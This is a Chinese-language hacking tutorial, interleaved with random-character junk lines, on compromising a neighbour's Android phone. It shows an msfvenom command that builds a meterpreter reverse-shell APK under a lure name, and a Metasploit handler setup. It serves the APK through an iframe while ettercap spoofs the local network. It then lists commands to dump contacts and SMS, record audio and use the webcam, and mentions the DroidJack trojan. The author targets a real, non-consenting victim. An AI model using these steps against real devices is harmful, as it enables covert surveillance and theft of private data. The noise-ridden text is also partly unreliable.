+ ^1 w) e& i0 V( I
五、msf+ettercap入侵邻居安卓手机
3 g) q# _& N) c8 V0 C' u4 z0 R* S D - V8 ?& v4 V& p5 t8 P" I
8 M+ W( }6 W7 ]4 F& S T- N 首先启动msf
5 G7 _$ J6 r; z% {8 N3 ~5 |4 u3 Z; \
) J& Q6 y: c& l4 C. p& I/ G- `5 l4 K4 W
先用kali生成一个安卓木马,如下命令:
" \1 T4 j1 z* G' | 2 n) D% l/ D4 E) x0 R
. n4 J: @- W# F2 L) \+ s
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 7 z% a0 n: N! [+ _1 B; a
$ v0 M, w% I, d# q2 ^7 L2 ^/ N- }! I- S( Z+ h: y& z
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ! Y6 Q5 Y# ~$ A# V. Z: z0 K, Z
& {: m6 w; j# O Y+ J/ N. a# B+ Y |' d; V+ j, D( ]
然后进入msf
- D/ B7 ]- e3 G7 p
) c3 s/ B7 |+ G* s) z' z
0 C- _; N& o7 J# U) `& A use exploit/multi/handler
& [) f- g. P) y) K4 M0 K
?( ~9 y* K8 r& u% Q! i' z! v7 ]2 s; C: Z" o
set payload android/meterpreter/reverse_tcp
* x% \: s) G3 F
' |$ l# p9 M8 }5 ^2 u$ n- E0 c9 c7 C" y# x u I0 Z
set LHOST 192.168.0.109 //ip为kaili的ip & o; {* h( n, b T/ v: X) T, Y; u
, c2 i. z* ?. N' |1 V7 O# a: k
+ T$ s1 N ]0 t6 `; Z. f set LPORT 44444 //端口一定要与前面生成的木马的端口一致
V" ~& L, d7 I* M/ }2 X - X# n+ A- |' v+ U) n* ~8 ~; F- p
# l9 _3 z0 z @ Exploit 2 f- L& i0 g4 z* m& I
7 c( \9 ~- k0 \! H
# y/ T: H& U8 J1 ~% y* y; V) c
/ p( D, G$ d: o: J! F$ r. | z8 N - ~6 ~7 V) p2 e7 Z3 v: _
, q- J" t, Q6 S+ u5 G( s; `
下面我们开启ettercap -G ' {' l$ t6 E/ A3 n
1 C: ~# x4 H3 w+ d( z e
% G4 F+ Z9 t8 }/ ?# l. M 我物理IP为 x2 i, J- q$ c2 a- O+ h5 o
9 E; q5 W3 Z" w# \6 d5 f
# t: S+ j9 T: y3 N2 }; b
; C. I1 T' z( b3 O8 L( A
& a6 H7 D1 ~, L
8 \9 |8 E s" d9 Z% H 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
4 ~8 m! D/ I n; B! e8 D, X . ^: `" a& x; P. T
* E. L K0 {+ C1 G0 a. ~6 o
下面我们来设置一下
; t; d( z7 q+ [$ ]6 T5 H; y ) _8 |+ B$ z k& y W/ v9 H
' [+ u& [/ y) e
! r+ t1 O9 S- ]) \' L% B) V
8 T* j u% u+ g1 L+ X1 z
7 s4 k' w ?5 F 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
' r! A9 N; b; L! r! X+ g
; _: t+ u3 J" l3 r) v7 y7 l7 C& u1 J \0 |- |* d
* U4 B2 j7 m8 r: L" k: {/ M ( d( y+ t; y& E
$ G" W- c |/ `8 z) ]: M Z2 z4 o3 h % @8 J. u) q& I. n( h
; N3 r: q6 |3 X0 j7 y* I8 i0 |' v, ?9 x h) r
6 P6 M6 `3 G/ B6 `: c8 b
1 W$ r6 ]4 A l% k
' i; s; i3 X. I
. f- X- ?) b% ?
- `* w5 o5 O7 n; B, [# {7 u1 c7 a; J( v1 l5 }
2 j. k' g3 P! y) D 0 Q# h* ~ v* o) z
% d2 j3 z Z& o% f; P9 r0 q9 }
! D/ H5 c( A$ M9 B6 J" H7 X r8 H
) C! W: E1 f- O$ s9 {5 z% f& O
+ S- J( ~! N+ u / Q9 T- `8 v3 U
: s+ F0 J8 ]5 W' t, T
- B4 i% X. R' ?% f H S% T% B7 L+ t
- H+ w0 j/ ]- I7 y3 ^! g# _. o ! q7 \) o4 ]9 _6 ?$ S: w7 Y6 [
. u# ~2 ?$ h* k8 ?( \: h/ G 0 D/ c. {+ r6 h, k! V
9 z+ g( _( A0 V9 y/ Z
5 K) j$ H4 W% ]' i
' M0 c. D6 {: s& o
, V' N, _3 S6 P2 k# Q$ ], ]$ {& d B3 A% T
7 i& C0 r3 K1 c& W& b6 I4 b
4 ^6 q0 g; b* C) x6 a- t9 e1 x. w2 B' y
# ^% {$ B) C% P- B+ k; i; F. a
% F- F- P# V( B) f. Q# J
/ H. d7 B7 j- o
( _: |+ _( u' `5 `, p
) J( u5 ^, s( I+ h! Z& h) I# z4 \7 [$ K
下面我们开始攻击 % e5 J; m. h- T$ D* Q2 q
. I! M; J, F9 g" J: C U3 t4 k& r# \% S7 }$ A
% m$ T( `$ F1 [3 ]6 V
* \6 T+ H& R" _8 c
5 W9 \1 ]( @: ]: k+ } z2 B
- F% B( {7 z5 I' A* ~ 9 m( j' k/ B9 M) H& P: V3 I) i9 B. p$ V
7 |5 v: i7 P4 |/ r$ L! k1 D6 M
; R5 X& `" e0 ^; f& h R. o! Y+ V7 ?: _/ f
0 H( P, ?% s. I' ^) }
9 I ?, d8 M" p7 ~0 D: E$ [ ( n$ h; Z! J6 m6 o* w3 v A
' P5 }- I! m/ a( |0 a$ B. C3 ?
d6 U) A* R* A+ T
, ~: U" f6 M+ v. p! x
& a3 z0 L( O/ M( P% l+ y! g 大概过了5分钟多,发现反弹成功了 6 g3 ]0 }+ G- f* b& C2 w3 \
# T1 {$ V: X4 j7 A/ Q9 B% H
- c- h6 i. c& ~+ y6 h( u , @, S+ D, w& w0 V
. X- e+ i' Q% F
8 i2 b/ {. N+ u# r4 }# W9 C3 a
~2 e2 y8 s$ h( a
2 H) f: U) l" {6 h( Q
, o9 _* S. O% q
2 u& B m/ _/ t6 c" D8 w
9 C; o' r) X5 A7 Z
( `5 ~& D& k0 e: z; {) _ 6 s. t8 W7 X& x: b+ m# `
2 c( M: E& @3 a+ _8 C, g# V" s
! b4 W, m# i$ {. x/ T* Z
: \7 q/ t8 I x : u; D0 @, h3 W( S! }9 b
) S& z! o- x) j9 Q8 m i# {
5 ~0 E" `8 T8 P 8 H2 _) W7 K$ R; x. H) B
- |% h2 R9 Z! Q- m: p- p ) Y! }+ y( {2 I; h. x# z5 F
n& f7 b+ I+ K% f7 o1 H' s( {4 V
! Y, T& _6 n' ^1 g, M 执行命令
- z& ?* g4 W( R I z8 @2 f
1 L* {( i6 G, H; x. l' U) T
1 ]8 w. x, N& X6 K4 n8 G0 d. z 7 `8 i) N9 a' R1 |) W+ o
( g$ ?# R6 u5 G. L3 w
4 o0 _) S8 x& U; H X! U dump_contacts --》这个是导出电话 0 t7 G$ k1 y, ~( Q- | h
, } j6 x5 M" }$ v' U
: d4 `4 N7 }0 Y3 j; i- ?' Q$ k4 E$ _
dump_sms --》这个是导出信息 + t/ T2 i: K) M% c9 H& f
% D: O, G. h7 `+ x
' A8 j0 ^! p! \# t
record_mic Record audio from the default microphone for X seconds 9 H! }0 C r9 D+ Y/ Y" X
1 G! E2 B5 H. F: t5 B4 T4 U: X+ r5 }, K
webcam_chat Start a video chat
) n9 g5 Y9 z) H$ v o7 k! K+ p l* x 2 J0 p. D+ d7 s# [3 i
& B& O6 M, v( B! P
webcam_list List webcams : ]. D* c3 i! C3 w, p
" h! Z& A# {) A$ m& i2 w* V9 J
- O. o4 S- x2 I* F. [: m$ G& s webcam_snap Take a snapshot from the specified webcam $ R! R; l/ Y6 E9 y2 `7 l
* V/ B/ g& V4 m+ v; D
2 n5 t, k, R- C% c webcam_stream  lay a video stream from the specified webcam . A& f' O+ v/ V3 r( u! u& _
3 a, {* [- J" Y
# r9 ? R `7 J' q2 i! { J
2 G8 x& W/ u( Y% U ; |! m' a% _9 ?4 j4 ^
' y! Z- E) x, l 5 d% ?+ @0 N; u* n! v
/ p" R) d2 b8 c1 m* H1 B* X
. [& Q) N2 W- |, i3 s 我们打开看一下电话薄, 0 X+ _/ K' |+ B
@* I* w9 j1 _
0 M5 P, R7 f# V- b& }+ z# Y 6 T0 d! y* E- J/ D) I; J
: }8 [7 U/ C% u$ Y/ W: V( G; v# R, Y! `6 W& F1 I, v# k
0 m4 |5 V1 ^6 a( F* k7 ]0 m3 I4 W
4 m, i6 j0 V% {5 d- h* R3 N1 ]
- R$ w" A5 ~ g" a7 z3 B / O7 G/ O9 r! z& i/ Y+ z7 I$ Z, _* f
* S* ~$ f7 z, ^# i' @: t6 E; l# h5 d1 R5 R6 O1 q) K
1 N- B( b( @) P! O+ Y2 w% I
6 S Z3 [8 Z) j# \6 ]$ r8 e y
/ F- _& V: i4 S8 z$ `1 M- c
c4 x; N7 R8 D9 w! T
3 a6 r) q; [( t9 }7 o
; f, o1 n3 @; V f7 |% W * ?# v8 a# e# u9 T" U' S
; f, r( _5 h- b5 f2 ~8 ?6 w- f* c+ X" ^9 a$ @* F- J- G( M2 n
我们同时欺骗成DroidJack木马,使用方法如图:
0 a+ c/ O4 l }# W2 R. U! r. Y ( g) f1 @3 k2 \5 |3 f
, a2 f4 ?7 b0 a5 F0 e( r ! ^) y6 H' o& |0 T" C' I
- }2 P& V t# `* N$ O
3 ]0 c- U& v( n; M$ K$ y z! S2 s
+ ]+ Y( g2 H) N1 ]5 }
. s: w# ]8 O0 u2 [
, j" L3 w. u. `1 A
% E+ X ?5 X6 ^: E T 0 C3 a& J/ n `4 Z7 |7 L
7 m% b9 e9 P0 M* e4 b3 S. n+ z
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
' z& D( V3 u; F3 j' e C - l. i5 v- R3 J% X+ n
3 Y$ f7 ]& h! R- y
# V- V( ~9 a" u2 q0 j4 ^; |: j# s 5 P1 n0 c/ o2 W, E+ w5 L3 q
3 E% P) [" l' x7 W/ K, p! x' ?( d 2 o E# W( y; ~& i% H
1 r1 ~: y+ T' [$ Z7 i9 ]5 Y
4 B+ l+ L" X3 G$ L9 l) N2 C! g3 w$ V( j * t' L# u! ^$ S" x7 a
1 t; {# [: w% v+ e+ r1 ?% W/ k
* Z, q# ~- C1 Q4 @
$ _/ X- S; I h- J* b
: ]6 d6 w. Y' I! ~5 f" h/ n+ L6 {! n7 Y5 x9 }
" z) M* U5 W# Y+ k
|